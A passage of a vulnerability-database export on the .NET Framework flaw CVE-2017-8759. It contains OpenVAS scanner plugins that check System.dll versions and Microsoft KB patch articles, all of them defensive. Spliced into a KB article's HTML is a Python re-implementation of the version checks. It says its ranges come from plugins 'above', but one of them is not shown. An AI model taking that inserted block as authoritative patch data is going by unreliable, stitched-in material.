script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A remote code execution vulnerability exists\n when Microsoft .NET Framework processes untrusted input. An attacker who\n successfully exploited this vulnerability in software using the .NET framework\n could take control of an affected system.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute code.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 3.5.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4040981\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nkey = \"SOFTWARE\\Microsoft\\ASP.NET\\\";\nif(!registry_key_exists(key:key)){\n exit(0);\n}\n\nforeach item (registry_enum_keys(key:key))\n{\n dotpath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotpath && \"\\Microsoft.NET\\Framework\" >< dotpath)\n {\n dllVer = fetch_file_version(sysPath:dotpath, file_name:\"System.dll\");\n if(dllVer)\n {\n ##.NET Framework 3.5 for Windows Server 2012: September 12, 2017\n if(version_in_range(version:dllVer, test_version:\"2.0.50727.8000\", test_version2:\"2.0.50727.8769\"))\n {\n report = 'File checked: ' + dotpath + \"\\system.dll\" + '\\n' +\n 'File version: ' + dllVer + '\\n' +\n 'Vulnerable range: 2.0.50727.8000 - 2.0.50727.8769' + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:26:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8759"], "description": "This host is missing an important security\n update according to Microsoft KB4040975", "modified": "2020-06-04T00:00:00", "published": "2017-09-13T00:00:00", "id": "OPENVAS:1361412562310811325", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811325", "type": "openvas", "title": "Microsoft .NET Framework Remote Code Execution 
Vulnerability (KB4040975)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040975)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811325\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8759\");\n script_bugtraq_id(100742);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-09-13 15:16:30 +0530 (Wed, 13 Sep 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040975)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4040975\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present 
on the target host.\");\n\n script_tag(name:\"insight\", value:\"A remote code execution vulnerability exists\n when Microsoft .NET Framework processes untrusted input. An attacker who\n successfully exploited this vulnerability in software using the .NET framework\n could take control of an affected system.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute code.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 4.5.2.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4040975\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2012:1) <= 0){\n exit(0);\n}\n\nkey = \"SOFTWARE\\Microsoft\\ASP.NET\\\";\nif(!registry_key_exists(key:key)){\n exit(0);\n}\n\nforeach item (registry_enum_keys(key:key))\n{\n dotpath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotpath && \"\\Microsoft.NET\\Framework\" >< dotpath)\n {\n dllVer = fetch_file_version(sysPath:dotpath, file_name:\"System.dll\");\n if(dllVer)\n {\n ## .NET Framework 4.5.2 for Windows Server 2012: September 12, 2017\n if(version_in_range(version:dllVer, test_version:\"4.0.30319.36000\", test_version2:\"4.0.30319.36410\"))\n {\n report = 'File checked: ' + dotpath + \"\\system.dll\" + '\\n' +\n 'File version: ' + dllVer + '\\n' +\n 'Vulnerable range: 4.0.30319.36000 - 4.0.30319.36410' + '\\n' ;\n 
security_message(data:report);\n exit(0);\n }\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:40:47", "bulletinFamily": "microsoft", "cvelist": ["CVE-2017-8759"], "description": "<html><body><p>Resolves a vulnerability in the Microsoft .NET Framework that could allow remote code execution when the .NET Framework processes untrusted input.</p><h2></h2><div class=\"kb-summary-section section\"><span>\ufeff</span><span>\ufeff</span><a bookmark-id=\"appliestoproducts\" data-content-id=\"\" data-content-type=\"\" href=\"#appliestoproducts\" managed-link=\"\" target=\"\">View products that this article applies to.</a><span>\ufeff</span><span>\ufeff</span><br/></div><h2>Summary</h2><p>This security update resolves a vulnerability in the Microsoft .NET Framework that could allow remote code execution when Microsoft .NET Framework processes untrusted input. An attacker who successfully exploits\u00a0this vulnerability in software by using the .NET Framework could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts that have full user rights. Users whose accounts are configured to have fewer user rights on the system could be less affected than users who operate by using administrative user rights.</p><p>To exploit the vulnerability, an attacker must first convince the user to open a malicious document or application.</p><p><span><span><span>This security update addresses the vulnerability by correcting how the .NET Framework validates untrusted input</span></span></span>. 
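The three OpenVAS plugins above share one detection idea: gate on the OS family (hotfix_check_sp), walk the ASP.NET registry keys to find each runtime's install path, read the file version of System.dll, and flag it if the version falls inside the build range the corresponding September 2017 KB replaced. The following is an added example, not code from the Greenbone plugins or from Microsoft, that reproduces that logic in Python over a constructed host inventory. The CHECKS table copies the three ranges and KB numbers from the plugins above; the "os" labels are shorthand for the hotfix_check_sp() arguments; host names, paths and System.dll versions in SAMPLE_HOSTS are made up for the demonstration.

```python
"""Re-implementation of the OpenVAS CVE-2017-8759 System.dll version checks.

Added example, not part of the OpenVAS plugins or the Microsoft KB articles.
Ranges and KB numbers are copied from the three plugins; hosts are constructed.
"""
from typing import Dict, Iterable, List, Tuple

# Vulnerable System.dll build ranges per plugin, keyed by the OS families the
# plugin gates on (shorthand for its hotfix_check_sp() arguments).
CHECKS: List[Dict] = [
    {"kb": "KB4040977", "framework": ".NET Framework 4.5.2",
     "os": {"win7", "win2008", "win2008r2"},
     "low": "4.0.30319.36000", "high": "4.0.30319.36414"},
    {"kb": "KB4040981", "framework": ".NET Framework 3.5",
     "os": {"win8_1", "win2012r2"},
     "low": "2.0.50727.8000", "high": "2.0.50727.8769"},
    {"kb": "KB4040975", "framework": ".NET Framework 4.5.2",
     "os": {"win2012"},
     "low": "4.0.30319.36000", "high": "4.0.30319.36410"},
]


def parse_version(ver: str, width: int = 4) -> Tuple[int, ...]:
    """Turn 'a.b.c.d' into an int tuple, zero-padding short versions.

    Components must be compared as integers: as strings, '4.0.30319.9' would
    sort above '4.0.30319.36414' because '9' > '3'.
    """
    parts = [int(p) for p in ver.strip().split(".") if p != ""]
    if len(parts) > width:
        raise ValueError(f"too many components in {ver!r}")
    return tuple(parts + [0] * (width - len(parts)))


def version_in_range(ver: str, low: str, high: str) -> bool:
    """Inclusive range test, mirroring version_in_range() in the plugins."""
    return parse_version(low) <= parse_version(ver) <= parse_version(high)


def missing_updates(os_family: str, system_dlls: Iterable[Tuple[str, str]]) -> List[Dict]:
    """Return one finding per vulnerable System.dll on a single host.

    system_dlls: (runtime install path, System.dll file version) pairs, i.e.
    what the plugins read from HKLM\\SOFTWARE\\Microsoft\\ASP.NET\\<ver>\\Path
    plus fetch_file_version().
    """
    findings = []
    for path, ver in system_dlls:
        # Same substring filter the plugins apply to the registry Path value.
        if "\\Microsoft.NET\\Framework" not in path:
            continue
        for chk in CHECKS:
            if os_family not in chk["os"]:
                continue  # range belongs to a different OS build of .NET
            if version_in_range(ver, chk["low"], chk["high"]):
                findings.append({
                    "kb": chk["kb"],
                    "framework": chk["framework"],
                    "file": path.rstrip("\\") + "\\System.dll",
                    "version": ver,
                    "range": f'{chk["low"]} - {chk["high"]}',
                })
    return findings


def scan(hosts: Dict[str, Dict]) -> Dict[str, List[Dict]]:
    """Run missing_updates() over an inventory of {host: {os, dlls}}."""
    return {name: missing_updates(h["os"], h["dlls"]) for name, h in hosts.items()}


# Constructed sample inventory (hypothetical hosts, not real scan output).
FX4 = "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319"
FX2 = "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727"
SAMPLE_HOSTS = {
    "srv-2008r2": {"os": "win2008r2", "dlls": [
        (FX4, "4.0.30319.36372"),   # inside the KB4040977 range: unpatched 4.5.2
        (FX2, "2.0.50727.5485"),    # 3.5.1 build; no range for it in the plugins above
    ]},
    "srv-2012": {"os": "win2012", "dlls": [
        (FX4, "4.0.30319.36412"),   # above the KB4040975 range (36410): patched on 2012
    ]},
    "srv-2012r2": {"os": "win2012r2", "dlls": [
        (FX2, "2.0.50727.8745"),    # inside the KB4040981 range: unpatched 3.5
    ]},
}

if __name__ == "__main__":
    for host, findings in scan(SAMPLE_HOSTS).items():
        if not findings:
            print(f"{host}: no vulnerable System.dll found")
        for f in findings:
            print(f"{host}: missing {f['kb']} ({f['framework']}) "
                  f"{f['file']} is {f['version']}, vulnerable range {f['range']}")
```

The OS gate is not cosmetic: the 4.5.2 fix ships as build 36411 on Windows Server 2012 (KB4040975) but as 36415 on Windows 7 / 2008 R2 (KB4040977), so a System.dll at 4.0.30319.36412 is patched on the former and unpatched on the latter. Dropping the gate, or comparing the version strings lexicographically, produces wrong answers in both directions.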
To learn more about this vulnerability, see <a href=\"https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2017-8759\" id=\"kb-link-2\" target=\"_self\">Microsoft Common Vulnerabilities and Exposures CVE-2017-8759</a>.</p><h2></h2><p><span class=\"text-base\">Important</span></p><ul><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/hh825699\" managed-link=\"\" target=\"_blank\">Add language packs to Windows</a>.</li></ul><h3><span>Update replacement information</span></h3><p><span><span><span>This update replaces updates <a href=\"https://support.microsoft.com/help/2987128\"><u>2987128</u></a>, and <a href=\"https://support.microsoft.com/help/2978116\"><u>2978116</u></a>.</span></span></span></p><h2>Additional information about this security update</h2><div><span>The following articles contain additional information about this security\u00a0update as it relates to individual product versions.</span></div><div>\u00a0</div><ul><li><span><a data-content-id=\"4040957\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040957</a>\u00a0Description of the Security Only update for the .NET Framework 4.6, 4.6.1, 4.6.2, and 4.7 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and for the .NET Framework 4.6 for Windows Server 2008 SP2: September 12, 2017</span></li><li><a data-content-id=\"4040960\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040960</a>\u00a0Description of the Security Only update for the .NET Framework 4.5.2 for Windows 7 SP1, Windows Server 2008 R2 SP1 and Windows Server 2008 SP2: September 12, 2017</li><li><a data-content-id=\"4040964\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040964</a>\u00a0Description of the 
Security Only update for the .NET Framework 2.0 SP2 for Windows Server 2008 SP2: September 12, 2017</li></ul><h2>How to obtain help and support for this security update</h2><ul><li><span>Help for installing updates: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/en-us/help/12373/windows-update-faq\" managed-link=\"\" target=\"_blank\">Windows Update FAQ</a></span></li><li><span>Security solutions for IT professionals: </span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/security/bb980617.aspx\" managed-link=\"\" target=\"_blank\">TechNet Security Support and Troubleshooting</a></li><li><span>Help for protecting your Windows-based products and services from viruses and malware: </span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" managed-link=\"\" target=\"_blank\">Microsoft Secure</a></li><li><span>Local support according to your country: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com\" managed-link=\"\" target=\"_blank\">International Support</a></span></li></ul><h2>Applies to</h2><div><span><span>\ufeff</span>This article applies to the following:</span></div><p>\u00a0</p><ul><li>Microsoft .NET Framework 2.0 SP2, 4.5.2, and 4.6 when used with:<ul><li>Windows Server 2008 Service Pack 2</li></ul></li></ul><div>\u00a0</div></body></html>", "edition": 3, "modified": "2017-09-12T17:17:18", "id": "KB4041093", "href": "https://support.microsoft.com/en-us/help/4041093/", "published": "2017-09-12T00:00:00", "title": "Security Only update for the .NET Framework 2.0 SP2, 4.5.2, and 4.6 for Windows Server 2008 SP2: September 12, 2017", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:48:22", "bulletinFamily": "microsoft", "cvelist": ["CVE-2017-8759"], "description": 
"<html><body><p>Resolves a vulnerability in the Microsoft .NET Framework that could allow remote code execution when Microsoft .NET Framework processes untrusted input.</p><h2></h2><div class=\"kb-summary-section section\"><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014600600_09450835418803427\">\ufeff</span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014605100_1781047559935547\">\ufeff</span><a bookmark-id=\"appliestoproducts\" data-content-id=\"\" data-content-type=\"\" href=\"#appliestoproducts\" managed-link=\"\" target=\"\">View products that this article applies to.</a><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014605100_7626286965278781\">\ufeff</span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014600599_5976545847215549\">\ufeff</span><br/></div><h2>Summary</h2><p>This security update resolves a vulnerability in the Microsoft .NET Framework that could allow remote code execution when Microsoft .NET Framework processes untrusted input. An attacker who successfully exploits\u00a0this vulnerability in software by using the .NET Framework could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts that have full user rights. Users whose accounts are configured to have fewer user rights on the system could be less affected than users who operate by using administrative user rights.</p><p>To exploit the vulnerability, an attacker must first convince the user to open a malicious document or application.</p><p><span><span><span>This security update addresses the vulnerability by correcting how the .NET Framework validates untrusted input</span></span></span>. 
To learn more about this vulnerability, see <a href=\"https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2017-8759\" id=\"kb-link-2\" target=\"_self\">Microsoft Common Vulnerabilities and Exposures CVE-2017-8759</a>.</p><h2></h2><p><span class=\"text-base\">Important</span></p><ul><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/hh825699\" managed-link=\"\" target=\"_blank\">Add language packs to Windows</a>.</li></ul><h3>Update replacement information</h3><p><span><span><span>This update replaces updates <a href=\"https://support.microsoft.com/help/2978120\">2978120</a>, and <a href=\"https://support.microsoft.com/help/2978128\">2978128</a>.</span></span></span></p><h2>Additional information about this security update</h2><div><span>The following articles contain additional information about this security update as it relates to individual product versions. 
The articles may contain known issue information.</span></div><div>\u00a0</div><ul><li><span><a data-content-id=\"4040973\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040973</a>\u00a0Description of the Security and Quality Rollup for the .NET Framework 4.6, 4.6.1, 4.6.2, and 4.7 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and for the .NET Framework 4.6 for Windows Server 2008 SP2: September 12, 2017</span></li><li><a data-content-id=\"4040977\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040977</a>\u00a0Description of the Security and Quality Rollup for the .NET Framework 4.5.2 for Windows 7 SP1, Windows Server 2008 R2 SP1 and Windows Server 2008 SP2: September 12, 2017</li><li><a data-content-id=\"4040980\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040980</a>\u00a0Description of the Security and Quality Rollup for the .NET Framework 3.5.1 for Windows 7 SP1 and Windows Server 2008 R2 SP1: September 12, 2017</li></ul><h3>Update replacement information</h3><p><span><span><span>This update replaces updates <a href=\"https://support.microsoft.com/help/2978120\"><u>2978120</u></a>, and <a href=\"https://support.microsoft.com/help/2978128\"><u>2978128</u></a>.</span></span></span></p><h2>How to obtain help and support for this security update</h2><ul><li><span>Help for installing updates: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/en-us/help/12373/windows-update-faq\" managed-link=\"\" target=\"_blank\">Windows Update FAQ</a></span></li><li><span>Security solutions for IT professionals: </span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/security/bb980617.aspx\" managed-link=\"\" target=\"_blank\">TechNet Security Support and Troubleshooting</a></li><li><span>Help for protecting your Windows-based products and services from viruses and malware: </span><a bookmark-id=\"\" data-content-id=\"\" 
data-content-type=\"\" href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" managed-link=\"\" target=\"_blank\">Microsoft Secure</a></li><li><span>Local support according to your country: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com\" managed-link=\"\" target=\"_blank\">International Support</a></span></li></ul><h2>Applies to</h2><div><span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014661954_27226468495375755\">\ufeff</span><a id=\"appliestoproducts\" name=\"appliestoproducts\"></a>This article applies to the following:</span><br/>\u00a0</div><ul><li>Microsoft .NET Framework 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, and 4.7 when used with:<ul><li>Windows Server 2008 R2 Service Pack 1</li><li>Windows 7 Service Pack 1</li></ul></li></ul></body></html>", "edition": 8, "modified": "2017-09-12T17:17:19", "id": "KB4041083", "href": "https://support.microsoft.com/en-us/help/4041083/", "published": "2017-09-12T00:00:00", "title": "Security and Quality Rollup for the .NET Framework 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2 and 4.7 for Windows 7 SP1 and Windows Server 2008 R2 SP1: September 12, 2017", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:42:00", "bulletinFamily": "microsoft", "cvelist": ["CVE-2017-8759"], "description": "<html><body><p>Resolves a vulnerability in the Microsoft .NET Framework that could allow remote code execution when the Microsoft .NET Framework processes untrusted input.</p><h2></h2><div class=\"kb-summary-section section\"><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014600600_09450835418803427\">\ufeff</span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014605100_1781047559935547\">\ufeff</span><a bookmark-id=\"appliestoproducts\" data-content-id=\"\" data-content-type=\"\" href=\"#appliestoproducts\" managed-link=\"\" target=\"\">View products that this article 
applies to.</a><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014605100_7626286965278781\">\ufeff</span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014600599_5976545847215549\">\ufeff</span><br/></div><h2>Summary</h2><div class=\"kb-summary-section section\"><p>This security update resolves a vulnerability in the Microsoft .NET Framework that could allow remote code execution when Microsoft .NET Framework processes untrusted input. An attacker who successfully exploits\u00a0this vulnerability in software by using the .NET Framework could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts that have full user rights. Users whose accounts are configured to have fewer user rights on the system could be less affected than users who operate with administrative user rights.</p><p>To exploit the vulnerability, an attacker would first have to convince the user to open a malicious document or application.</p><p>This security update addresses the vulnerability by correcting how the .NET Framework validates untrusted input.<span>\u00a0To learn more about this vulnerability, see </span><a href=\"https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2017-8759\" id=\"kb-link-2\" target=\"_self\">Microsoft Common Vulnerabilities and Exposures CVE-2017-8759</a><span>.</span></p></div><h2></h2><p><span class=\"text-base\">Important</span></p><ul><li><span><span><span>All updates for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2 require update <a href=\"https://support.microsoft.com/en-us/help/2919355\" target=\"_self\"><span><span><span>2919355</span></span></span></a> to be installed. 
We recommend that you install update <a href=\"https://support.microsoft.com/en-us/help/2919355\" target=\"_self\"><span><span><span>2919355</span></span></span></a> on your Windows RT 8.1-based, Windows 8.1-based, or Windows Server 2012 R2-based computer so that you receive updates in the future</span></span></span>.</li><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/hh825699\" managed-link=\"\" target=\"_blank\">Add language packs to Windows</a>.</li></ul><h3><span>Update replacement information</span></h3><p><span><span><span>This update replaces updates <a href=\"https://support.microsoft.com/help/2978122\"><u>2978122</u></a>, and <a href=\"https://support.microsoft.com/help/2978126\"><u>2978126</u></a>.</span></span></span></p><h2>Additional information about this security update</h2><div><span>The following articles contain additional information about this security update as it relates to individual product versions. 
The articles may contain known issue information.</span></div><div>\u00a0</div><ul><li><span><a data-content-id=\"4040972\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040972</a>\u00a0Description of the Security and Quality Rollup for the .NET Framework 4.6, 4.6.1, 4.6.2, and 4.7 for Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2: September 12, 2017</span></li><li><a data-content-id=\"4040974\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040974</a>\u00a0Description of the Security and Quality Rollup for the .NET Framework 4.5.2 for Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2: September 12, 2017</li><li><a data-content-id=\"4040981\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040981</a>\u00a0Description of the Security and Quality Rollup for the .NET Framework 3.5 for Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2: September 12, 2017</li></ul><h2>How to obtain help and support for this security update</h2><ul><li><span>Help for installing updates: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/en-us/help/12373/windows-update-faq\" managed-link=\"\" target=\"_blank\">Windows Update FAQ</a></span></li><li><span>Security solutions for IT professionals: </span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/security/bb980617.aspx\" managed-link=\"\" target=\"_blank\">TechNet Security Support and Troubleshooting</a></li><li><span>Help for protecting your Windows-based products and services from viruses and malware: </span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" managed-link=\"\" target=\"_blank\">Microsoft Secure</a></li><li><span>Local support according to your country: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com\" managed-link=\"\" 
target=\"_blank\">International Support</a></span></li></ul><h2>Applies to</h2><div><span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014661954_27226468495375755\">\ufeff</span><a id=\"appliestoproducts\" name=\"appliestoproducts\"></a>This article applies to the following:</span><br/>\u00a0</div><ul><li>Microsoft .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, and 4.7 when used with:<ul><li>Windows Server 2012 R2</li><li>Windows RT 8.1</li><li>Windows 8.1</li></ul></li></ul></body></html>", "edition": 7, "modified": "2017-09-12T17:17:19", "id": "KB4041085", "href": "https://support.microsoft.com/en-us/help/4041085/", "published": "2017-09-12T00:00:00", "title": "Security and Quality Rollup for the .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, and 4.7 for Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2: September 12, 2017", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:49:05", "bulletinFamily": "microsoft", "cvelist": ["CVE-2017-8759"], "description": "<html><body><p>Resolves a vulnerability in the Microsoft .NET Framework that could allow remote code execution when the .NET Framework processes untrusted input.</p><h2></h2><div class=\"kb-summary-section section\"><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014600600_09450835418803427\">\ufeff</span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014605100_1781047559935547\">\ufeff</span><a bookmark-id=\"appliestoproducts\" data-content-id=\"\" data-content-type=\"\" href=\"#appliestoproducts\" managed-link=\"\" target=\"\">View products that this article applies to.</a><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014605100_7626286965278781\">\ufeff</span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014600599_5976545847215549\">\ufeff</span><br/></div><h2>Summary</h2><p>This security update resolves a vulnerability in the Microsoft .NET 
Framework that could allow remote code execution when Microsoft .NET Framework processes untrusted input. An attacker who successfully exploits\u00a0this vulnerability in software by using the .NET Framework could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts that have full user rights. Users whose accounts are configured to have fewer user rights on the system could be less affected than users who operate by using administrative user rights.</p><p>To exploit the vulnerability, an attacker must first convince the user to open a malicious document or application.</p><p><span><span><span>This security update addresses the vulnerability by correcting how the .NET Framework validates untrusted input</span></span></span>. To learn more about this vulnerability, see <a href=\"https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2017-8759\" id=\"kb-link-2\" target=\"_self\">Microsoft Common Vulnerabilities and Exposures CVE-2017-8759</a>.</p><h2></h2><p><span class=\"text-base\">Important</span></p><ul><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. 
For more information, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/hh825699\" managed-link=\"\" target=\"_blank\">Add language packs to Windows</a>.</li></ul><h3><span>Update replacement information</span></h3><p><span><span><span>This update replaces updates <a href=\"https://support.microsoft.com/help/2978121\"><u>2978121</u></a>, and <a href=\"https://support.microsoft.com/help/2978127\"><u>2978127</u></a>.</span></span></span></p><h2>Additional information about this security update</h2><div><span>The following articles contain additional information about this security update as it relates to individual product versions. The articles may contain known issue information.</span></div><div>\u00a0</div><ul><li><span><a data-content-id=\"4040971\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040971</a>\u00a0Description of the Security and Quality Rollup for the .NET Framework 4.6, 4.6.1, 4.6.2, and 4.7 for Windows Server 2012: September 12, 2017</span></li><li><a data-content-id=\"4040975\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040975</a>\u00a0Description of the Security and Quality Rollup for the .NET Framework 4.5.2 for Windows Server 2012: September 12, 2017</li><li><a data-content-id=\"4040979\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040979</a>\u00a0Description of the Security and Quality Rollup for the .NET Framework 3.5 for Windows Server 2012: September 12, 2017</li></ul><h2>How to obtain help and support for this security update</h2><ul><li><span>Help for installing updates: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/en-us/help/12373/windows-update-faq\" managed-link=\"\" target=\"_blank\">Windows Update FAQ</a></span></li><li><span>Security solutions for IT professionals: </span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" 
